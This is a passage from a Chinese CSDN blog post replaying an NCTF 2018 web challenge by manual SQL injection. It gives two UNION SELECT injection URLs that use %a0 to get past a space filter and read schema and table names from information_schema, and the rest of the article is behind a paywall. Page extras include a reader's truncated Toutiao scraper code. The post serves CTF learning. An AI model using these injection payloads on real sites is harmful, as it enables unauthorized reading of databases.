nctf 2018 web复现-手工sql注入

最新推荐文章于 2024-12-21 14:01:48 发布

宋花郎

最新推荐文章于 2024-12-21 14:01:48 发布

阅读量375

点赞数

文章标签： ctf sql

版权声明：本文为博主原创文章，遵循 CC 4.0 BY-SA 版权协议，转载请附上原文出处链接和本声明。

本文链接：https://blog.csdn.net/weidaxueshen1/article/details/84582763

版权

本文复现了2018年NCTF的一道Web题目，涉及手工SQL注入技巧。通过注入点id=1'，利用%a0进行空格绕过，查询了数据库名、表名、列名，并最终获取到隐藏的th1s_1s_flag字段，揭示了CTF中常见的SQL注入策略和绕过方法。

摘要由CSDN通过智能技术生成

http://ctfgame.acdxvfsvd.net:20001/index.php?id=1'%a0union%a0select%a0database(),(select%a0SCHE MA_NAME%a0from%a0information_schema.SCHEMATA%a0limit%a02,1),3||'1数据库名

http://ctfgame.acdxvfsvd.net:20001/index.php?id=1'%a0union%a0select%a0database(),(select%a0table_NAME%a0from%a0information_schema.tables%a0where%a0TABLE_SCHEMA="flaaaaaaag"%a0limit%a00,1),3||'1

最低0.47元/天解锁文章

博客等级

码龄7年

6
原创

1
点赞

2
收藏

1
粉丝

关注

私信

热门文章

分类专栏

语音识别 1篇
鉴权 1篇
python 3篇

最新评论

今日头条美图爬虫跟新
宋花郎回复董胥祥: 那可能是网页结构改了，可能需要重新分析一下
今日头条美图爬虫跟新
董胥祥: 详情页不能爬了，代理和头都试了[code=python] import requests from urllib.parse import urlencode from requests.exceptions import RequestException import json from bs4 import BeautifulSoup import re def get_page_index(offset,keyword): data={ 'offset':offset, 'format':'json', 'keyword':keyword, 'autoload':'true', 'count':'20', 'cur_tab':'1', 'from':'search_tab' } url='https://www.toutiao.com/search_content/?'+urlencode(data) try: response=requests.get(url) if response.status_code==200: return response.text return None except RequestException: print("索引页请求失败") return None def parse_page_index(html): data=json.loads(html) if data and 'data' in data.keys(): for item in data.get('data'): yield item.get('article_url') #（data）and （‘data’in data.keys()），指的是data存在并且‘data’在data。keys()中 def get_page_detail(url): try: proxies = { "http": "http://180.168.13.26:8000", "http": "http://121.31.148.64:8123" } headers={'User-Agent':'Mozilla/5.0 (Windows NT 6.

最新文章

目录

评论

被折叠的条评论为什么被折叠?

到【灌水乐园】发言

查看更多评论

添加红包

成就一亿技术人!

hope_wisdom

发出的红包

实付元

使用余额支付

点击重新获取

扫码支付

钱包余额 0

抵扣说明：

1.余额是钱包充值的虚拟货币，按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载，可以购买VIP、付费专栏及课程。